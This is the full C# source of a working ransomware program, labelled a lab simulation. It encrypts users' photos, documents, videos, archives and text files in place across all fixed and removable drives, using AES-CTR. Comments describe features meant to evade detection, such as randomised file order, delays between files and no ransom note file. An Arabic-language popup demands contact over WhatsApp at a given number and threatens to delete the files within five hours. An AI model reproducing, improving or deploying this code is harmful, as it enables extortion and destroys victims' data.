// Low-signature variant WITH popup - lab simulation. (PT11 + 4GB cap + text file types) // * IN-PLACE encryption: the SAME file is overwritten (same name, same size). // * AES-256-CTR keystream (size preserving). // * Per-file nonce derived from HMAC(key, fullpath) => no manifest file needed. // * Random file order + small random delay between files (lower behavioural signature). // * POPUP (System.Windows.Forms.MessageBox) after encryption. // Compile REQUIRES: /r:System.Windows.Forms.dll // Changes vs PhotoTask11: MaxBytes 2GB -> 4GB; added .txt/.log/.md; skips *.d.ts files. // Scope: images/pdf/word/excel/ppt/video/archives/text across fixed+removable drives. // Safety: skips Windows, Program Files (x86), ProgramData, AppData, $Recycle.Bin, // System Volume Information, Recovery, reparse points; skips files > 4 GB. // Key: single file in %USERPROFILE% (KeyName). Run once -> encrypt; run again -> restore. using System; using System.IO; using System.Text; using System.Security.Cryptography; using System.Collections.Generic; using System.Windows.Forms; class PhotoTask13 { static readonly long MaxBytes = 4L * 1024 * 1024 * 1024; // 4 GB static readonly string KeyName = "key.dat"; static readonly int DelayMinMs = 5; // set both to 0 for no delay static readonly int DelayMaxMs = 60; static readonly bool ShowPopup = true; static readonly bool WriteNote = false; // keep README off (lower signature) // ===== POPUP MESSAGE (edit here) ===== static readonly string PopupTitle = "تم تشفير كامل ملفاتك"; static readonly string PopupText = "!!!جرب تفتح أي ملف من ملفاتك!!!\n\n" + "لا تطفي الجهاز وخذ صورة لهذه الشاشة\n\n" + "للاستعادة: تواصل على الواتس أب 0572608830\n\n" + "(المهلة:خمس ساعات من الآن قبل حذف الملفات)"; // ===================================== static string Profile { get { return Environment.GetFolderPath(Environment.SpecialFolder.UserProfile); } } static string KeyFile { get { return Path.Combine(Profile, KeyName); } } static string NoteFile { get { return Path.Combine(Profile, "README.txt"); } } static readonly HashSet Exts = new HashSet(StringComparer.OrdinalIgnoreCase) { ".jpg",".jpeg",".jpe",".png",".gif",".bmp",".tif",".tiff",".webp",".heic",".heif", ".svg",".ico",".raw",".cr2",".cr3",".nef",".arw",".dng",".orf",".rw2",".pef", ".pdf", ".doc",".docx",".docm",".rtf",".odt", ".xls",".xlsx",".xlsm",".xlsb",".xlt",".xltx",".xltm",".ods",".csv",".tsv", ".ppt",".pptx",".pptm",".odp", ".mp4",".m4v",".mkv",".avi",".mov",".wmv",".flv",".webm",".mpg",".mpeg", ".3gp",".3g2",".ts",".mts",".m2ts",".vob",".rmvb",".rm",".ogv",".f4v",".asf",".divx", ".zip",".zipx",".rar",".7z",".tar",".tgz",".gz",".gzip",".bz2",".xz", ".lzma",".lz4",".zst",".br",".z",".cab",".arj",".lzh",".lha",".ace", // text / notes (NEW) ".txt",".log",".md",".text" }; static readonly string[] SkipPathFragments = { @"\Windows\", @"\Program Files\", @"\Program Files (x86)\", @"\ProgramData\", @"\AppData\", @"\$Recycle.Bin\", @"\System Volume Information\", @"\Recovery\" }; static bool IsSkippedDir(string path) { string norm = (path + @"\").Replace('/', '\\'); foreach (string frag in SkipPathFragments) if (norm.IndexOf(frag, StringComparison.OrdinalIgnoreCase) >= 0) return true; return false; } static bool IsReparse(string path) { try { return (File.GetAttributes(path) & FileAttributes.ReparsePoint) != 0; } catch { return true; } } static bool IsTargetExt(string path) { // never treat TypeScript declaration files as video ".ts" if (path.ToLowerInvariant().EndsWith(".d.ts")) return false; return Exts.Contains(Path.GetExtension(path)); } static bool IsInfraFile(string path) { string nm = Path.GetFileName(path).ToLowerInvariant(); if (nm == KeyName.ToLowerInvariant()) return true; if (nm == "readme.txt") return true; if (nm.EndsWith(".locked")) return true; if (nm.EndsWith(".cs")) return true; return false; } static List Walk(string root) { var result = new List(); var stack = new Stack(); stack.Push(root); while (stack.Count > 0) { string cur = stack.Pop(); string[] files; try { files = Directory.GetFiles(cur); } catch { files = new string[0]; } foreach (string f in files) result.Add(f); string[] subs; try { subs = Directory.GetDirectories(cur); } catch { subs = new string[0]; } foreach (string d in subs) { if (IsSkippedDir(d)) continue; if (IsReparse(d)) continue; stack.Push(d); } } return result; } static List Roots() { var r = new List(); foreach (DriveInfo drv in DriveInfo.GetDrives()) { try { if (drv.IsReady && (drv.DriveType == DriveType.Fixed || drv.DriveType == DriveType.Removable)) r.Add(drv.RootDirectory.FullName); } catch { } } return r; } static void Shuffle(List list, Random rng) { for (int i = list.Count - 1; i > 0; i--) { int j = rng.Next(i + 1); string t = list[i]; list[i] = list[j]; list[j] = t; } } static byte[] NonceFor(byte[] key, string path) { using (var h = new HMACSHA256(key)) { byte[] full = h.ComputeHash(Encoding.UTF8.GetBytes(path.ToLowerInvariant())); byte[] n = new byte[16]; Array.Copy(full, n, 16); return n; } } static void ApplyKeystream(byte[] data, byte[] key, byte[] nonce) { using (Aes aes = Aes.Create()) { aes.Key = key; aes.Mode = CipherMode.ECB; aes.Padding = PaddingMode.None; using (ICryptoTransform enc = aes.CreateEncryptor()) { byte[] ctr = new byte[16]; Array.Copy(nonce, 0, ctr, 0, 16); byte[] ks = new byte[16]; int off = 0; while (off < data.Length) { enc.TransformBlock(ctr, 0, 16, ks, 0); int n = Math.Min(16, data.Length - off); for (int i = 0; i < n; i++) data[off + i] ^= ks[i]; off += n; for (int i = 15; i >= 0; i--) { if (++ctr[i] != 0) break; } } } } } static void Main() { Console.WriteLine("=== Indexer (lab) ==="); Console.WriteLine(); bool decrypt = File.Exists(KeyFile); byte[] key; if (decrypt) key = File.ReadAllBytes(KeyFile); else { key = new byte[32]; using (var rng = RandomNumberGenerator.Create()) rng.GetBytes(key); File.WriteAllBytes(KeyFile, key); } var files = new List(); foreach (string root in Roots()) files.AddRange(Walk(root)); files.RemoveAll(f => !IsTargetExt(f) || IsInfraFile(f)); var rng2 = new Random(); Shuffle(files, rng2); int n = 0, skipped = 0; foreach (string f in files) { try { long len = new FileInfo(f).Length; if (len == 0) { skipped++; continue; } if (len > MaxBytes) { skipped++; continue; } byte[] data = File.ReadAllBytes(f); ApplyKeystream(data, key, NonceFor(key, f)); File.WriteAllBytes(f, data); n++; if (n <= 20) Console.WriteLine(" [+] " + (decrypt ? "Restored: " : "Processed: ") + Path.GetFileName(f)); if (DelayMaxMs > 0) System.Threading.Thread.Sleep(rng2.Next(DelayMinMs, DelayMaxMs + 1)); } catch { skipped++; } } if (decrypt) { try { File.Delete(KeyFile); } catch { } Console.WriteLine(); Console.WriteLine("Reverse complete. " + n + " file(s)"); if (ShowPopup) { try { MessageBox.Show("تمت استعادة ملفاتك (" + n + " ملف).", PopupTitle, MessageBoxButtons.OK, MessageBoxIcon.Information); } catch { } } } else { if (WriteNote) { try { File.WriteAllText(NoteFile, PopupText); } catch { } } Console.WriteLine(); Console.WriteLine("Done. Processed " + n + " file(s), skipped " + skipped + "."); if (ShowPopup) { try { MessageBox.Show(PopupText, PopupTitle, MessageBoxButtons.OK, MessageBoxIcon.Warning); } catch { } } } } }